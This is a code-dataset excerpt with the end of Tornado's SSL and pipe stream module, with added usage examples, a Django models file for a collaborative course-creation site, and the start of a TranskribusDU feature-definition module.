orig_close_callback = self._close_callback
self._close_callback = None
future = TracebackFuture()
ssl_stream = SSLIOStream(socket, ssl_options=ssl_options,
io_loop=self.io_loop)
# Wrap the original close callback so we can fail our Future as well.
# If we had an "unwrap" counterpart to this method we would need
# to restore the original callback after our Future resolves
# so that repeated wrap/unwrap calls don't build up layers.
def close_callback():
if not future.done():
# Note that unlike most Futures returned by IOStream,
# this one passes the underlying error through directly
# instead of wrapping everything in a StreamClosedError
# with a real_error attribute. This is because once the
# connection is established it's more helpful to raise
# the SSLError directly than to hide it behind a
# StreamClosedError (and the client is expecting SSL
# issues rather than network issues since this method is
# named start_tls).
future.set_exception(ssl_stream.error or StreamClosedError())
if orig_close_callback is not None:
orig_close_callback()
ssl_stream.set_close_callback(close_callback)
ssl_stream._ssl_connect_callback = lambda: future.set_result(ssl_stream)
ssl_stream.max_buffer_size = self.max_buffer_size
ssl_stream.read_chunk_size = self.read_chunk_size
return future
def _handle_connect(self):
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
self.error = socket.error(err, os.strerror(err))
# IOLoop implementations may vary: some of them return
# an error state before the socket becomes writable, so
# in that case a connection failure would be handled by the
# error path in _handle_events instead of here.
if self._connect_future is None:
gen_log.warning("Connect error on fd %s: %s",
self.socket.fileno(), errno.errorcode[err])
self.close()
return
if self._connect_callback is not None:
callback = self._connect_callback
self._connect_callback = None
self._run_callback(callback)
if self._connect_future is not None:
future = self._connect_future
self._connect_future = None
future.set_result(self)
self._connecting = False
def set_nodelay(self, value):
if (self.socket is not None and
self.socket.family in (socket.AF_INET, socket.AF_INET6)):
try:
self.socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, 1 if value else 0)
except socket.error as e:
# Sometimes setsockopt will fail if the socket is closed
# at the wrong time. This can happen with HTTPServer
# resetting the value to false between requests.
if e.errno != errno.EINVAL and not self._is_connreset(e):
raise
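# --- Illustrative sketch (not part of the upstream module) -------------------
# A coroutine-based variant of the callback-chained HTTP client shown in the
# IOStream docstring above, using the Future interface of connect, write,
# read_until and read_until_close. Host and port are example values only.
def _example_http_get(host="example.com", port=80):
    from tornado import gen, ioloop
    @gen.coroutine
    def fetch():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        stream = IOStream(s)
        yield stream.connect((host, port))
        yield stream.write(b"GET / HTTP/1.0\r\nHost: " +
                           host.encode("ascii") + b"\r\n\r\n")
        headers = yield stream.read_until(b"\r\n\r\n")
        body = yield stream.read_until_close()
        raise gen.Return((headers, body))
    return ioloop.IOLoop.current().run_sync(fetch)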
class SSLIOStream(IOStream):
"""A utility class to write to and read from a non-blocking SSL socket.
If the socket passed to the constructor is already connected,
it should be wrapped with::
ssl.wrap_socket(sock, do_handshake_on_connect=False, **kwargs)
before constructing the `SSLIOStream`. Unconnected sockets will be
wrapped when `IOStream.connect` is finished.
"""
def __init__(self, *args, **kwargs):
"""The ``ssl_options`` keyword argument may either be an
        `ssl.SSLContext` object or a dictionary of keyword arguments
        for `ssl.wrap_socket`.
"""
self._ssl_options = kwargs.pop('ssl_options', _client_ssl_defaults)
super(SSLIOStream, self).__init__(*args, **kwargs)
self._ssl_accepting = True
self._handshake_reading = False
self._handshake_writing = False
self._ssl_connect_callback = None
self._server_hostname = None
# If the socket is already connected, attempt to start the handshake.
try:
self.socket.getpeername()
except socket.error:
pass
else:
# Indirectly start the handshake, which will run on the next
# IOLoop iteration and then the real IO state will be set in
# _handle_events.
self._add_io_state(self.io_loop.WRITE)
def reading(self):
return self._handshake_reading or super(SSLIOStream, self).reading()
def writing(self):
return self._handshake_writing or super(SSLIOStream, self).writing()
def _do_ssl_handshake(self):
# Based on code from test_ssl.py in the python stdlib
try:
self._handshake_reading = False
self._handshake_writing = False
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
self._handshake_reading = True
return
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
self._handshake_writing = True
return
elif err.args[0] in (ssl.SSL_ERROR_EOF,
ssl.SSL_ERROR_ZERO_RETURN):
return self.close(exc_info=True)
elif err.args[0] == ssl.SSL_ERROR_SSL:
try:
peer = self.socket.getpeername()
except Exception:
peer = '(not connected)'
gen_log.warning("SSL Error on %s %s: %s",
self.socket.fileno(), peer, err)
return self.close(exc_info=True)
raise
except socket.error as err:
# Some port scans (e.g. nmap in -sT mode) have been known
# to cause do_handshake to raise EBADF and ENOTCONN, so make
# those errors quiet as well.
# https://groups.google.com/forum/?fromgroups#!topic/python-tornado/ApucKJat1_0
if (self._is_connreset(err) or
err.args[0] in (errno.EBADF, errno.ENOTCONN)):
return self.close(exc_info=True)
raise
except AttributeError:
# On Linux, if the connection was reset before the call to
# wrap_socket, do_handshake will fail with an
# AttributeError.
return self.close(exc_info=True)
else:
self._ssl_accepting = False
if not self._verify_cert(self.socket.getpeercert()):
self.close()
return
self._run_ssl_connect_callback()
def _run_ssl_connect_callback(self):
if self._ssl_connect_callback is not None:
callback = self._ssl_connect_callback
self._ssl_connect_callback = None
self._run_callback(callback)
if self._ssl_connect_future is not None:
future = self._ssl_connect_future
self._ssl_connect_future = None
future.set_result(self)
def _verify_cert(self, peercert):
"""Returns True if peercert is valid according to the configured
validation mode and hostname.
The ssl handshake already tested the certificate for a valid
CA signature; the only thing that remains is to check
the hostname.
"""
if isinstance(self._ssl_options, dict):
verify_mode = self._ssl_options.get('cert_reqs', ssl.CERT_NONE)
elif isinstance(self._ssl_options, ssl.SSLContext):
verify_mode = self._ssl_options.verify_mode
assert verify_mode in (ssl.CERT_NONE, ssl.CERT_REQUIRED, ssl.CERT_OPTIONAL)
if verify_mode == ssl.CERT_NONE or self._server_hostname is None:
return True
cert = self.socket.getpeercert()
if cert is None and verify_mode == ssl.CERT_REQUIRED:
gen_log.warning("No SSL certificate given")
return False
try:
ssl_match_hostname(peercert, self._server_hostname)
except SSLCertificateError as e:
gen_log.warning("Invalid SSL certificate: %s" % e)
return False
else:
return True
def _handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
return
super(SSLIOStream, self)._handle_read()
def _handle_write(self):
if self._ssl_accepting:
self._do_ssl_handshake()
return
super(SSLIOStream, self)._handle_write()
def connect(self, address, callback=None, server_hostname=None):
self._server_hostname = server_hostname
# Pass a dummy callback to super.connect(), which is slightly
# more efficient than letting it return a Future we ignore.
super(SSLIOStream, self).connect(address, callback=lambda: None)
return self.wait_for_handshake(callback)
def _handle_connect(self):
# Call the superclass method to check for errors.
super(SSLIOStream, self)._handle_connect()
if self.closed():
return
# When the connection is complete, wrap the socket for SSL
# traffic. Note that we do this by overriding _handle_connect
# instead of by passing a callback to super().connect because
# user callbacks are enqueued asynchronously on the IOLoop,
# but since _handle_events calls _handle_connect immediately
# followed by _handle_write we need this to be synchronous.
#
# The IOLoop will get confused if we swap out self.socket while the
# fd is registered, so remove it now and re-register after
# wrap_socket().
self.io_loop.remove_handler(self.socket)
old_state = self._state
self._state = None
self.socket = ssl_wrap_socket(self.socket, self._ssl_options,
server_hostname=self._server_hostname,
do_handshake_on_connect=False)
self._add_io_state(old_state)
def wait_for_handshake(self, callback=None):
"""Wait for the initial SSL handshake to complete.
If a ``callback`` is given, it will be called with no
arguments once the handshake is complete; otherwise this
method returns a `.Future` which will resolve to the
stream itself after the handshake is complete.
Once the handshake is complete, information such as
the peer's certificate and NPN/ALPN selections may be
accessed on ``self.socket``.
This method is intended for use on server-side streams
or after using `IOStream.start_tls`; it should not be used
with `IOStream.connect` (which already waits for the
handshake to complete). It may only be called once per stream.
.. versionadded:: 4.2
"""
if (self._ssl_connect_callback is not None or
self._ssl_connect_future is not None):
raise RuntimeError("Already waiting")
if callback is not None:
self._ssl_connect_callback = stack_context.wrap(callback)
future = None
else:
future = self._ssl_connect_future = TracebackFuture()
if not self._ssl_accepting:
self._run_ssl_connect_callback()
return future
def write_to_fd(self, data):
try:
return self.socket.send(data)
except ssl.SSLError as e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
# In Python 3.5+, SSLSocket.send raises a WANT_WRITE error if
# the socket is not writeable; we need to transform this into
# an EWOULDBLOCK socket.error or a zero return value,
# either of which will be recognized by the caller of this
# method. Prior to Python 3.5, an unwriteable socket would
# simply return 0 bytes written.
return 0
raise
def read_from_fd(self):
if self._ssl_accepting:
# If the handshake hasn't finished yet, there can't be anything
# to read (attempting to read may or may not raise an exception
# depending on the SSL version)
return None
try:
# SSLSocket objects have both a read() and recv() method,
# while regular sockets only have recv().
# The recv() method blocks (at least in python 2.6) if it is
# called when there is nothing to read, so we have to use
# read() instead.
chunk = self.socket.read(self.read_chunk_size)
except ssl.SSLError as e:
# SSLError is a subclass of socket.error, so this except
# block must come first.
if e.args[0] == ssl.SSL_ERROR_WANT_READ:
return None
else:
raise
except socket.error as e:
if e.args[0] in _ERRNO_WOULDBLOCK:
return None
else:
raise
if not chunk:
self.close()
return None
return chunk
def _is_connreset(self, e):
if isinstance(e, ssl.SSLError) and e.args[0] == ssl.SSL_ERROR_EOF:
return True
return super(SSLIOStream, self)._is_connreset(e)
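# --- Illustrative sketch (not part of the upstream module) -------------------
# Client-side use of SSLIOStream: the TLS handshake runs after the TCP connect
# completes, and passing server_hostname enables certificate/hostname
# validation and SNI as documented in IOStream.connect. Host is an example.
def _example_ssl_get(host="example.com", port=443):
    from tornado import gen, ioloop
    @gen.coroutine
    def fetch():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        stream = SSLIOStream(s)
        yield stream.connect((host, port), server_hostname=host)
        yield stream.write(b"GET / HTTP/1.0\r\nHost: " +
                           host.encode("ascii") + b"\r\n\r\n")
        reply = yield stream.read_until_close()
        raise gen.Return(reply)
    return ioloop.IOLoop.current().run_sync(fetch)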
class PipeIOStream(BaseIOStream):
"""Pipe-based `IOStream` implementation.
The constructor takes an integer file descriptor (such as one returned
by `os.pipe`) rather than an open file object. Pipes are generally
one-way, so a `PipeIOStream` can be used for reading or writing but not
both.
"""
def __init__(self, fd, *args, **kwargs):
self.fd = fd
_set_nonblocking(fd)
super(PipeIOStream, self).__init__(*args, **kwargs)
def fileno(self):
return self.fd
def close_fd(self):
os.close(self.fd)
def write_to_fd(self, data):
return os.write(self.fd, data)
def read_from_fd(self):
try:
chunk = os.read(self.fd, self.read_chunk_size)
except (IOError, OSError) as e:
if errno_from_exception(e) in _ERRNO_WOULDBLOCK:
return None
elif errno_from_exception(e) == errno.EBADF:
# If the writing half of a pipe is closed, select will
# report it as readable but reads will fail with EBADF.
self.close(exc_info=True)
return None
else:
raise
if not chunk:
self.close()
return None
return chunk
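# --- Illustrative sketch (not part of the upstream module) -------------------
# Minimal PipeIOStream round trip over os.pipe(). Pipes are one-way, so one
# stream wraps the read end and another wraps the write end.
def _example_pipe_roundtrip():
    from tornado import gen, ioloop
    @gen.coroutine
    def roundtrip():
        r, w = os.pipe()
        reader, writer = PipeIOStream(r), PipeIOStream(w)
        yield writer.write(b"ping\n")
        data = yield reader.read_until(b"\n")
        writer.close()
        reader.close()
        raise gen.Return(data)
    return ioloop.IOLoop.current().run_sync(roundtrip)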
def _double_prefix(deque):
"""Grow by doubling, but don't split the second chunk just because the
first one is small.
"""
new_len = max(len(deque[0]) * 2,
(len(deque[0]) + len(deque[1])))
_merge_prefix(deque, new_len)
def _merge_prefix(deque, size):
"""Replace the first entries in a deque of strings with a single
string of up to size bytes.
>>> d = collections.deque(['abc', 'de', 'fghi', 'j'])
>>> _merge_prefix(d, 5); print(d)
deque(['abcde', 'fghi', 'j'])
Strings will be split as necessary to reach the desired size.
>>> _merge_prefix(d, 7); print(d)
deque(['abcdefg', 'hi', 'j'])
>>> _merge_prefix(d, 3); print(d)
deque(['abc', 'defg', 'hi', 'j'])
>>> _merge_prefix(d, 100); print(d)
deque(['abcdefghij'])
"""
if len(deque) == 1 and len(deque[0]) <= size:
return
prefix = []
remaining = size
while deque and remaining > 0:
chunk = deque.popleft()
if len(chunk) > remaining:
deque.appendleft(chunk[remaining:])
chunk = chunk[:remaining]
prefix.append(chunk)
remaining -= len(chunk)
# This data structure normally just contains byte strings, but
# the unittest gets messy if it doesn't use the default str() type,
# so do the merge based on the type of data that's actually present.
if prefix:
deque.appendleft(type(prefix[0])().join(prefix))
if not deque:
deque.appendleft(b"")
def doctests():
import doctest
return doctest.DocTestSuite()
| gpl-3.0 | 8,333,440,828,056,137,000 | 41.058027 | 128 | 0.589649 | false |
crowd-course/scholars | scholars/courses/models.py | 1 | 19377 | import os
import pytz
from datetime import tzinfo, timedelta, datetime
from django.conf import settings
from django.core.validators import MinValueValidator
from django.db import models
from django.db.models import F, Count, ExpressionWrapper, DateField, DateTimeField
from django.db.models.signals import pre_delete, post_save, pre_save
from django.utils.translation import gettext_noop
from model_utils import Choices, FieldTracker
from scholars.courses.signals import update_course_counters, update_course_status_phase
from scholars.users.models import User
from scholars.utils.models import TimeStampable
from scholars.utils.utils import clear_folder
from scholars.utils.utils import import_presentation, send_manually_exception_email, copy_file, writable_permissions
from scholars.utils.slack import Slack
def get_image_path(instance, filename):
import os
full_name = os.path.join(
"%d" % instance.course.id, "images", "%03d.png" % instance.position)
media_path = os.path.join(settings.MEDIA_ROOT, full_name)
# if os.path.exists(media_path):
# return os.path.join(settings.MEDIA_URL, full_name)
return full_name
def get_audio_path(instance, filename):
import os
full_name = os.path.join(
"%d" % instance.course.id, "audio", "%03d.mp3" % instance.position)
media_path = os.path.join(settings.MEDIA_ROOT, full_name)
# if os.path.exists(media_path):
# return os.path.join(settings.MEDIA_URL, full_name)
return full_name
def get_video_path(id):
import os
full_name = os.path.join(
"%d" % id, "videos", "video.mp4")
media_path = os.path.join(settings.MEDIA_ROOT, full_name)
if os.path.exists(media_path):
return os.path.join(settings.MEDIA_URL, full_name)
return None
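# Illustrative note (not part of the original module): the helpers above lay
# media out per course under MEDIA_ROOT. For course id 12 and slide position 7
# the upload paths are "12/images/007.png" and "12/audio/007.mp3", and
# get_video_path(12) returns MEDIA_URL + "12/videos/video.mp4" only when that
# file already exists on disk (otherwise None).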
class Category(TimeStampable):
name = models.CharField(max_length=2048, unique=True)
shortcode = models.CharField(max_length=8, null=True, blank=True)
class Meta:
verbose_name_plural = "categories"
def __unicode__(self):
return "%s" % self.name
def __str__(self):
return "%s" % self.name
class CourseQuerySet(models.QuerySet):
def in_progress(self):
return self.filter(
status=Course.STATUS.in_progress
)
def include_members_needed(self):
return self.select_related().annotate(
presentation_needed=F('num_presentation') - F('num_presentation_actual'),
graphics_needed=F('num_graphics') - F('num_graphics_actual'),
scripting_needed=F('num_scripting') - F('num_scripting_actual'),
audio_needed=F('num_audio') - F('num_audio_actual'),
dri_needed=F('num_dri') - F('num_dri_actual'),
members_count=Count('members'),
min_date=ExpressionWrapper(F('created_at') + timedelta(days=7), output_field=DateTimeField())
)
def meets_requirements_for_in_progress(self):
return self.include_members_needed().filter(
status=Course.STATUS.proposed,
min_date__lt=datetime.now(pytz.timezone('UTC')),
presentation_needed__lte=0,
graphics_needed__lte=0,
scripting_needed__lte=0,
audio_needed__lte=0,
dri_needed__lte=0,
members_count__gte=10
).order_by('-members_count')
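# Illustrative sketch (not part of the original module): the queryset above is
# exposed further down as ``Course.requirements``; a periodic task might use it
# to promote fully staffed proposals. The helper name is hypothetical.
def _example_promote_ready_courses():
    promoted = 0
    for course in Course.requirements.meets_requirements_for_in_progress():
        course.status = Course.STATUS.in_progress
        course.save()
        promoted += 1
    return promoted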
class Course(TimeStampable):
STATUS = Choices(
(0, 'proposed', 'Proposed'),
(1, 'in_progress', 'In Progress'),
(2, 'published', 'Published')
)
PHASE = Choices(
(0, 'onboarding', 'Onboarding'),
(1, 'reading', 'Reading'),
(2, 'discussion', 'Discussion'),
(3, 'slides', 'Slides'),
(4, 'peer_review', 'Peer Review'),
(5, 'audio', 'Audio'),
(6, 'refine', 'Refinement'),
(7, 'pending_approval', 'Pending Approval'),
)
LANGUAGE = Choices(
('xx', 'xx', gettext_noop('Unknown')),
('af', 'af', gettext_noop('Afrikaans')),
('ar', 'ar', gettext_noop('Arabic')),
('ast', 'ast', gettext_noop('Asturian')),
('az', 'az', gettext_noop('Azerbaijani')),
('bg', 'bg', gettext_noop('Bulgarian')),
('be', 'be', gettext_noop('Belarusian')),
('bn', 'bn', gettext_noop('Bengali')),
('br', 'br', gettext_noop('Breton')),
('bs', 'bs', gettext_noop('Bosnian')),
('ca', 'ca', gettext_noop('Catalan')),
('cs', 'cs', gettext_noop('Czech')),
('cy', 'cy', gettext_noop('Welsh')),
('da', 'da', gettext_noop('Danish')),
('de', 'de', gettext_noop('German')),
('el', 'el', gettext_noop('Greek')),
('en', 'en', gettext_noop('English')),
('eo', 'eo', gettext_noop('Esperanto')),
('es', 'es', gettext_noop('Spanish')),
('et', 'et', gettext_noop('Estonian')),
('eu', 'eu', gettext_noop('Basque')),
('fa', 'fa', gettext_noop('Persian')),
('fi', 'fi', gettext_noop('Finnish')),
('fil', 'fil', gettext_noop('Filipino')),
('fr', 'fr', gettext_noop('French')),
('fy', 'fy', gettext_noop('Frisian')),
('ga', 'ga', gettext_noop('Irish')),
('gd', 'gd', gettext_noop('Scottish Gaelic')),
('gl', 'gl', gettext_noop('Galician')),
('he', 'he', gettext_noop('Hebrew')),
('hi', 'hi', gettext_noop('Hindi')),
('hr', 'hr', gettext_noop('Croatian')),
('hu', 'hu', gettext_noop('Hungarian')),
('ia', 'ia', gettext_noop('Interlingua')),
('id', 'id', gettext_noop('Indonesian')),
('io', 'io', gettext_noop('Ido')),
('is', 'is', gettext_noop('Icelandic')),
('it', 'it', gettext_noop('Italian')),
('ja', 'ja', gettext_noop('Japanese')),
('ka', 'ka', gettext_noop('Georgian')),
('kk', 'kk', gettext_noop('Kazakh')),
('km', 'km', gettext_noop('Khmer')),
('kn', 'kn', gettext_noop('Kannada')),
('ko', 'ko', gettext_noop('Korean')),
('lb', 'lb', gettext_noop('Luxembourgish')),
('lt', 'lt', gettext_noop('Lithuanian')),
('lv', 'lv', gettext_noop('Latvian')),
('mk', 'mk', gettext_noop('Macedonian')),
('ml', 'ml', gettext_noop('Malayalam')),
('mn', 'mn', gettext_noop('Mongolian')),
('mr', 'mr', gettext_noop('Marathi')),
('my', 'my', gettext_noop('Burmese')),
('nb', 'nb', gettext_noop('Norwegian Bokmal')),
('ne', 'ne', gettext_noop('Nepali')),
('nl', 'nl', gettext_noop('Dutch')),
('nn', 'nn', gettext_noop('Norwegian Nynorsk')),
('or', 'or', gettext_noop('Odia')),
('os', 'os', gettext_noop('Ossetic')),
('pa', 'pa', gettext_noop('Punjabi')),
('pl', 'pl', gettext_noop('Polish')),
('pt', 'pt', gettext_noop('Portuguese')),
('ro', 'ro', gettext_noop('Romanian')),
('ru', 'ru', gettext_noop('Russian')),
('sk', 'sk', gettext_noop('Slovak')),
('sl', 'sl', gettext_noop('Slovenian')),
('sq', 'sq', gettext_noop('Albanian')),
('sr', 'sr', gettext_noop('Serbian')),
('sv', 'sv', gettext_noop('Swedish')),
('sw', 'sw', gettext_noop('Swahili')),
('ta', 'ta', gettext_noop('Tamil')),
('te', 'te', gettext_noop('Telugu')),
('th', 'th', gettext_noop('Thai')),
('tr', 'tr', gettext_noop('Turkish')),
('tt', 'tt', gettext_noop('Tatar')),
('udm', 'udm', gettext_noop('Udmurt')),
('uk', 'uk', gettext_noop('Ukrainian')),
('ur', 'ur', gettext_noop('Urdu')),
('vi', 'vi', gettext_noop('Vietnamese')),
('zh', 'zh', gettext_noop('Mandarin')),
('zho', 'zho', gettext_noop('Chinese')),
)
doi = models.CharField(max_length=256, null=True, blank=True)
parent = models.ForeignKey('self', null=True, blank=True, related_name="variants")
version = models.PositiveIntegerField(default=1)
lang = models.CharField(max_length=8, choices=LANGUAGE, default='en')
name = models.CharField(max_length=2048)
owner = models.ForeignKey(User, related_name='courses')
status = models.PositiveIntegerField(choices=STATUS, default=STATUS.proposed)
phase = models.PositiveIntegerField(choices=PHASE, default=PHASE.onboarding)
is_featured = models.BooleanField(default=False)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, blank=True)
url = models.CharField(max_length=1024, null=True, blank=True)
pdf = models.CharField(max_length=1024, null=True, blank=True)
type = models.CharField(max_length=256, null=True, blank=True)
publisher = models.CharField(max_length=2048, null=True, blank=True)
published_on = models.DateField(null=True, blank=True)
authors = models.CharField(max_length=4096, null=True, blank=True)
pages = models.CharField(max_length=64, null=True, blank=True)
# minimum requirements
num_presentation = models.PositiveIntegerField(default=2, validators=[MinValueValidator(1)])
num_graphics = models.PositiveIntegerField(default=2, validators=[MinValueValidator(0)])
num_scripting = models.PositiveIntegerField(default=2, validators=[MinValueValidator(1)])
num_audio = models.PositiveIntegerField(default=2, validators=[MinValueValidator(1)])
num_dri = models.PositiveIntegerField(default=2)
# available
num_presentation_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_graphics_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_scripting_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_audio_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_dri_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
# presentation
gid = models.CharField(max_length=256, null=True, blank=True)
# questionnaire
qid = models.CharField(max_length=256, null=True, blank=True)
# slack
cid = models.CharField(max_length=256, null=True, blank=True)
channel = models.CharField(max_length=256, null=True, blank=True)
# youtube
yid = models.CharField(max_length=256, null=True, blank=True)
# timelines
in_progress_at = models.DateTimeField(null=True, blank=True)
# phase timelines
reading_at = models.DateTimeField(null=True, blank=True)
discussion_at = models.DateTimeField(null=True, blank=True)
slides_at = models.DateTimeField(null=True, blank=True)
peer_review_at = models.DateTimeField(null=True, blank=True)
audio_at = models.DateTimeField(null=True, blank=True)
refine_at = models.DateTimeField(null=True, blank=True)
pending_approval_at = models.DateTimeField(null=True, blank=True)
approved_at = models.DateTimeField(null=True, blank=True)
tracker = FieldTracker(fields=['status', 'phase'])
objects = models.Manager()
requirements = CourseQuerySet.as_manager()
class Meta:
unique_together = ('name', 'lang', 'version')
def __unicode__(self):
return "%s [%d slides][%s]" % (self.name, self.slides.count(), self.lang)
def __str__(self):
return "%s [%d slides][%s]" % (self.name, self.slides.count(), self.lang)
@property
def phase_display(self):
return Course.PHASE[self.phase]
@property
def status_display(self):
return Course.STATUS[self.status]
@property
def youtube_display(self):
if self.yid == '' or self.yid is None:
return ''
return 'https://youtu.be/%s' % self.yid
@property
def category_display(self):
if self.category is not None:
return self.category.name
return 'General'
@property
def lang_display(self):
if self.lang is not None:
return Course.LANGUAGE[self.lang]
return 'Unknown'
@property
def num_presentation_required(self):
required = self.num_presentation - self.num_presentation_actual
if required >= 0:
return required
return 0
@property
def num_graphics_required(self):
required = self.num_graphics - self.num_graphics_actual
if required >= 0:
return required
return 0
@property
def num_scripting_required(self):
required = self.num_scripting - self.num_scripting_actual
if required >= 0:
return required
return 0
@property
def num_audio_required(self):
required = self.num_audio - self.num_audio_actual
if required >= 0:
return required
return 0
@property
def num_dri_required(self):
required = self.num_dri - self.num_dri_actual
if required >= 0:
return required
return 0
@property
def total_members(self):
return self.members.count()
def get_video_url(self):
video_url = get_video_path(self.id)
if video_url is not None:
return '<a href="%s" target="_blank">Video</a>' % video_url
# u'<video width="320" height="240" controls><source src="%s" type="video/mp4">Your browser does not support the video tag.</video>' % video_url
return None
get_video_url.short_description = 'Video'
get_video_url.allow_tags = True
@property
def video_url(self):
video_url = None
if self.id is not None:
video_url = get_video_path(self.id)
return video_url
def total_slides(self):
if self.slides is not None:
return self.slides.count()
return 0
total_slides.short_description = 'Total Slides'
def pending_slides(self):
if self.slides is not None:
return self.slides.filter(status=Slide.STATUS.pending_approval).count()
return 0
pending_slides.short_description = 'Pending Approval'
def delete(self, using=None, keep_parents=False):
if self.pk is not None and len(str(self.pk)) > 0:
folder = os.path.join(settings.MEDIA_ROOT, '%d' % self.pk)
try:
clear_folder(folder)
except:
pass
super(Course, self).delete()
def make_in_progress(self):
try:
if self.id is not None:
# create questionnaire
if self.qid is None:
response = copy_file(self.id, settings.QUESTIONNAIRE_TEMPLATE, self.name)
writable_permissions(response['id'])
self.qid = response['id']
# self.save()
# copy_file(self.id, settings.WORKFLOW_TEMPLATE, self.name)
# create presentation
if self.gid is None:
response = copy_file(self.id, settings.PRESENTATION_TEMPLATE, self.name)
writable_permissions(response['id'])
self.gid = response['id']
# self.save()
try:
# create slack channel
if self.cid is None:
slack = Slack()
result = slack.create_channel('%s%d' % (self.category.shortcode.lower(), self.id))
print result
if 'ok' in result and result['ok']:
self.channel = result['channel']['name']
self.cid = result['channel']['id']
except Exception as es:
print "slack"
print es
except Exception as e:
# todo call sentry
print "error while changing status to progress"
print e
pre_save.connect(update_course_status_phase, sender=Course)
class CourseMember(TimeStampable):
EXPERTISE = Choices(
(1, 'novice', 'Novice'),
(2, 'primary', 'Primary'),
(3, 'medium', 'Medium'),
(4, 'advanced', 'Advanced'),
(5, 'expert', 'Expert'),
)
TIMEZONES = [(str(i), str(i)) for i in pytz.all_timezones]
course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name='members')
member = models.ForeignKey(User, related_name='course_contributions')
expertise = models.PositiveIntegerField(choices=EXPERTISE, default=EXPERTISE.novice)
timezone = models.CharField(max_length=128, choices=TIMEZONES, blank=True, null=True)
time_commitment = models.PositiveIntegerField(default=0) # hours per week
presentation = models.BooleanField(default=False)
graphics = models.BooleanField(default=False)
scripting = models.BooleanField(default=False)
audio = models.BooleanField(default=False)
dri = models.BooleanField(default=False)
been_dri = models.BooleanField(default=False)
# field for actual selection
is_dri = models.BooleanField(default=False)
class Meta:
unique_together = ('course', 'member')
def __str__(self):
        return '%s - %s' % (self.course.name, self.member.username)
pre_delete.connect(update_course_counters, sender=CourseMember)
class Slide(TimeStampable):
STATUS = Choices(
(0, 'draft', 'Draft'),
(1, 'in_progress', 'In Progress'),
(2, 'pending_approval', 'Pending Approval'),
(3, 'published', 'Published')
)
gid = models.CharField(max_length=256, null=True, blank=True)
version = models.PositiveIntegerField(default=1)
image = models.ImageField(upload_to=get_image_path, null=True, blank=True)
audio = models.FileField(upload_to=get_audio_path, null=True, blank=True)
notes = models.TextField(max_length=5000, null=True, blank=True)
position = models.PositiveIntegerField(default=0)
course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name='slides')
status = models.PositiveIntegerField(choices=STATUS, default=STATUS.draft)
assigned_to = models.ForeignKey(User, related_name='slides', null=True, blank=True)
class Meta:
ordering = ['position']
def __str__(self):
return '%s %d' % (self.course.name, self.position)
@property
def status_text(self):
return self.STATUS[self.status]
# @property
def image_url(self):
return u'<img src="%s" style="max-width:250px;max-height:250px" />' % self.image.url
image_url.short_description = 'Image'
image_url.allow_tags = True
# @property
def audio_url(self):
return u'<audio controls src="%s" style="max-width:200px;" />' % self.audio.url
audio_url.short_description = 'Audio'
audio_url.allow_tags = True
class SlideReview(TimeStampable):
STATUS = Choices(
(1, 'proposed', 'Proposed'),
(2, 'resolved', 'Resolved')
)
STAGE = Choices(
(1, 'peer_review', 'Peer Review'),
(2, 'refine', 'Refine')
)
slide = models.ForeignKey(Slide, on_delete=models.CASCADE, related_name='reviews')
feedback = models.TextField(max_length=5000, null=True, blank=True)
status = models.PositiveIntegerField(choices=STATUS, default=STATUS.proposed)
stage = models.PositiveIntegerField(choices=STAGE, default=STAGE.peer_review)
user = models.ForeignKey(User, related_name='reviews', null=True, blank=True)
def __str__(self):
return '%s %s' % (self.slide.course.name, self.STAGE[self.stage])
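# Illustrative sketch (not part of the original module): the typical flow of
# proposing a course and signing up its first contributor. Field values are
# example data and ``user`` is assumed to be an existing User instance.
def _example_propose_course(user):
    course = Course.objects.create(name="Example paper title", owner=user, lang='en')
    CourseMember.objects.create(course=course, member=user,
                                scripting=True, audio=True, time_commitment=4)
    return course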
| mit | -8,950,352,779,626,918,000 | 35.838403 | 156 | 0.604944 | false |
Transkribus/TranskribusDU | TranskribusDU/graph/FeatureDefinition_Generic.py | 1 | 6856 | # -*- coding: utf-8 -*-
"""
Standard PageXml features:
- not using the page information
- using a QuantileTransformer for numerical features instead of a StandardScaler
No link with DOM or JSON => named GENERIC
Copyright Xerox(C) 2016, 2019 JL. Meunier
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
import numpy as np
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.feature_extraction.text import TfidfVectorizer
#not robust to empty arrays, so use our robust intermediary class instead
#from sklearn.preprocessing import StandardScaler
from .Transformer import SparseToDense
from .FeatureDefinition import FeatureDefinition
from .Transformer import EmptySafe_QuantileTransformer as QuantileTransformer
from .Transformer_Generic import NodeTransformerTextEnclosed
from .Transformer_Generic import NodeTransformerTextLen
from .Transformer_Generic import NodeTransformerXYWH
from .Transformer_Generic import NodeTransformerNeighbors
from .Transformer_Generic import EdgeBooleanAlignmentFeatures
from .Transformer_Generic import EdgeNumericalSelector_noText
class FeatureDefinition_Generic(FeatureDefinition):
n_QUANTILES = 64
def __init__(self
, n_tfidf_node=None, t_ngrams_node=None, b_tfidf_node_lc=None
#, n_tfidf_edge=None, t_ngrams_edge=None, b_tfidf_edge_lc=None
):
FeatureDefinition.__init__(self)
self.n_tfidf_node, self.t_ngrams_node, self.b_tfidf_node_lc = n_tfidf_node, t_ngrams_node, b_tfidf_node_lc
# self.n_tfidf_edge, self.t_ngrams_edge, self.b_tfidf_edge_lc = n_tfidf_edge, t_ngrams_edge, b_tfidf_edge_lc
tdifNodeTextVectorizer = TfidfVectorizer(lowercase=self.b_tfidf_node_lc
, max_features=self.n_tfidf_node
